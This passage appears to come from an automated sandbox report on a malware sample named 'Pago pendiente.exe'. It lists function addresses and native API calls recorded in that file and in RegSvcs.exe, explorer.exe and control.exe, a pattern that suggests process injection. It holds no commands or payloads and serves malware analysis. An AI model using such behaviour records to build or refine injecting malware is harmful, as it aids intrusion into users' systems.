          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822AF0 NtWriteFile,7_2_04822AF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822B80 NtQueryInformationFile,7_2_04822B80
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822BA0 NtEnumerateValueKey,7_2_04822BA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04823090 NtSetValueKey,7_2_04823090
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04823010 NtOpenDirectoryObject,7_2_04823010
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04823D10 NtOpenProcessToken,7_2_04823D10
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04823D70 NtOpenThread,7_2_04823D70
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048239B0 NtGetContextThread,7_2_048239B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025BA360 NtCreateFile,7_2_025BA360
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025BA410 NtReadFile,7_2_025BA410
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025BA490 NtClose,7_2_025BA490
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025BA540 NtAllocateVirtualMemory,7_2_025BA540
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025BA35A NtCreateFile,7_2_025BA35A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025BA53B NtAllocateVirtualMemory,7_2_025BA53B
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_031AD91C0_2_031AD91C
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_058B05180_2_058B0518
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_058B05100_2_058B0510
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077267980_2_07726798
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077295280_2_07729528
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077245F80_2_077245F8
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077298400_2_07729840
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077258E80_2_077258E8
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077267170_2_07726717
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_0772A7C00_2_0772A7C0
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_0772A7B00_2_0772A7B0
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077276780_2_07727678
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_0772663F0_2_0772663F
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077276880_2_07727688
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077245600_2_07724560
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077285400_2_07728540
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077285310_2_07728531
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077295180_2_07729518
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077253450_2_07725345
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077253480_2_07725348
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07724E710_2_07724E71
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_0772BEE80_2_0772BEE8
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_0772BED80_2_0772BED8
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07724E800_2_07724E80
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07723AE80_2_07723AE8
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07728AE80_2_07728AE8
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07723AD80_2_07723AD8
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_0772DAC60_2_0772DAC6
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077298310_2_07729831
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077258D80_2_077258D8
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077288B00_2_077288B0
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077288A30_2_077288A3
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07A51E980_2_07A51E98
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07A5B6300_2_07A5B630
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07A51E880_2_07A51E88
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07A556880_2_07A55688
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07A556980_2_07A55698
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07A56EE80_2_07A56EE8
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07A54E280_2_07A54E28
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07A552600_2_07A55260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004010285_2_00401028
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041D9B75_2_0041D9B7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041E2145_2_0041E214
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041ECEE5_2_0041ECEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00402D885_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409E5B5_2_00409E5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409E605_2_00409E60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041D6A45_2_0041D6A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C81585_2_014C8158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014301005_2_01430100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DA1185_2_014DA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F81CC5_2_014F81CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F41A25_2_014F41A2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_015001AA5_2_015001AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D20005_2_014D2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FA3525_2_014FA352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144E3F05_2_0144E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_015003E65_2_015003E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E02745_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C02C05_2_014C02C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014405355_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_015005915_2_01500591
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F24465_2_014F2446
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E44205_2_014E4420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EE4F65_2_014EE4F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014647505_2_01464750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014407705_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143C7C05_2_0143C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145C6E05_2_0145C6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014569625_2_01456962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A05_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0150A9A65_2_0150A9A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144A8405_2_0144A840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014428405_2_01442840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E8F05_2_0146E8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014268B85_2_014268B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FAB405_2_014FAB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F6BD75_2_014F6BD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143EA805_2_0143EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144AD005_2_0144AD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DCD1F5_2_014DCD1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143ADE05_2_0143ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01458DBF5_2_01458DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440C005_2_01440C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01430CF25_2_01430CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0CB55_2_014E0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B4F405_2_014B4F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01482F285_2_01482F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01460F305_2_01460F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E2F305_2_014E2F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01432FC85_2_01432FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144CFE05_2_0144CFE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BEFA05_2_014BEFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440E595_2_01440E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FEE265_2_014FEE26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FEEDB5_2_014FEEDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01452E905_2_01452E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FCE935_2_014FCE93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0147516C5_2_0147516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142F1725_2_0142F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0150B16B5_2_0150B16B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144B1B05_2_0144B1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EF0CC5_2_014EF0CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014470C05_2_014470C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F70E95_2_014F70E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FF0E05_2_014FF0E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142D34C5_2_0142D34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F132D5_2_014F132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0148739A5_2_0148739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145B2C05_2_0145B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E12ED5_2_014E12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014452A05_2_014452A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F75715_2_014F7571
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_015095C35_2_015095C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DD5B05_2_014DD5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014314605_2_01431460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FF43F5_2_014FF43F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FF7B05_2_014FF7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014856305_2_01485630
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F16CC5_2_014F16CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014499505_2_01449950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145B9505_2_0145B950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D59105_2_014D5910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AD8005_2_014AD800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014438E05_2_014438E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FFB765_2_014FFB76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B5BF05_2_014B5BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0147DBF95_2_0147DBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145FB805_2_0145FB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FFA495_2_014FFA49
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F7A465_2_014F7A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B3A6C5_2_014B3A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EDAC65_2_014EDAC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DDAAC5_2_014DDAAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01485AA05_2_01485AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E1AA35_2_014E1AA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01443D405_2_01443D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F1D5A5_2_014F1D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F7D735_2_014F7D73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145FDC05_2_0145FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B9C325_2_014B9C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FFCF25_2_014FFCF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FFF095_2_014FFF09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01441F925_2_01441F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FFFB15_2_014FFFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01449EB05_2_01449EB0
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4CE2326_2_0E4CE232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4CD0366_2_0E4CD036
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4C40826_2_0E4C4082
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4C5D026_2_0E4C5D02
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4CB9126_2_0E4CB912
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4C8B306_2_0E4C8B30
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4C8B326_2_0E4C8B32
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4D15CD6_2_0E4D15CD
          Source: C:\Windows\explorer.exeCode function: 6_2_101CB0366_2_101CB036
          Source: C:\Windows\explorer.exeCode function: 6_2_101C20826_2_101C2082
          Source: C:\Windows\explorer.exeCode function: 6_2_101C99126_2_101C9912
          Source: C:\Windows\explorer.exeCode function: 6_2_101C3D026_2_101C3D02
          Source: C:\Windows\explorer.exeCode function: 6_2_101CF5CD6_2_101CF5CD
          Source: C:\Windows\explorer.exeCode function: 6_2_101CC2326_2_101CC232
          Source: C:\Windows\explorer.exeCode function: 6_2_101C6B306_2_101C6B30
          Source: C:\Windows\explorer.exeCode function: 6_2_101C6B326_2_101C6B32
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0006764B7_2_0006764B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0006305C7_2_0006305C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0006978B7_2_0006978B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0489E4F67_2_0489E4F6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048944207_2_04894420
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A24467_2_048A2446
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048B05917_2_048B0591
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F05357_2_047F0535
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0480C6E07_2_0480C6E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F07707_2_047F0770
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047EC7C07_2_047EC7C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048147507_2_04814750
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048820007_2_04882000
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048B01AA7_2_048B01AA
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A41A27_2_048A41A2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A81CC7_2_048A81CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047E01007_2_047E0100
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0488A1187_2_0488A118
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048781587_2_04878158
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048702C07_2_048702C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048902747_2_04890274
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048B03E67_2_048B03E6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047FE3F07_2_047FE3F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AA3527_2_048AA352
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04890CB57_2_04890CB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F0C007_2_047F0C00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047E0CF27_2_047E0CF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04808DBF7_2_04808DBF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047FAD007_2_047FAD00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0488CD1F7_2_0488CD1F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047EADE07_2_047EADE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04802E907_2_04802E90
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048ACE937_2_048ACE93
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F0E597_2_047F0E59
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AEEDB7_2_048AEEDB
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AEE267_2_048AEE26
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486EFA07_2_0486EFA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047FCFE07_2_047FCFE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04832F287_2_04832F28
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04810F307_2_04810F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047E2FC87_2_047E2FC8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04892F307_2_04892F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04864F407_2_04864F40
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F28407_2_047F2840
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047FA8407_2_047FA840
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0481E8F07_2_0481E8F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D68B87_2_047D68B8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048BA9A67_2_048BA9A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F29A07_2_047F29A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048069627_2_04806962
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047EEA807_2_047EEA80
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A6BD77_2_048A6BD7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AAB407_2_048AAB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047E14607_2_047E1460
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AF43F7_2_048AF43F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0488D5B07_2_0488D5B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048B95C37_2_048B95C3
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A75717_2_048A7571
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A16CC7_2_048A16CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048356307_2_04835630
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AF7B07_2_048AF7B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0489F0CC7_2_0489F0CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A70E97_2_048A70E9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AF0E07_2_048AF0E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F70C07_2_047F70C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DF1727_2_047DF172
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047FB1B07_2_047FB1B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048BB16B7_2_048BB16B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482516C7_2_0482516C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0480B2C07_2_0480B2C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048912ED7_2_048912ED
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F52A07_2_047F52A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0483739A7_2_0483739A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DD34C7_2_047DD34C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A132D7_2_048A132D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AFCF27_2_048AFCF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04869C327_2_04869C32
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F3D407_2_047F3D40
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0480FDC07_2_0480FDC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A1D5A7_2_048A1D5A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A7D737_2_048A7D73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F9EB07_2_047F9EB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AFFB17_2_048AFFB1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AFF097_2_048AFF09
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B3FD27_2_047B3FD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B3FD57_2_047B3FD5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F1F927_2_047F1F92
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485D8007_2_0485D800
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F38E07_2_047F38E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047F99507_2_047F9950
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048859107_2_04885910
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0480B9507_2_0480B950
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04835AA07_2_04835AA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0488DAAC7_2_0488DAAC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04891AA37_2_04891AA3
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0489DAC67_2_0489DAC6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AFA497_2_048AFA49
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048A7A467_2_048A7A46
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04863A6C7_2_04863A6C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0480FB807_2_0480FB80
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04865BF07_2_04865BF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482DBF97_2_0482DBF9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048AFB767_2_048AFB76
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025A9E5B7_2_025A9E5B
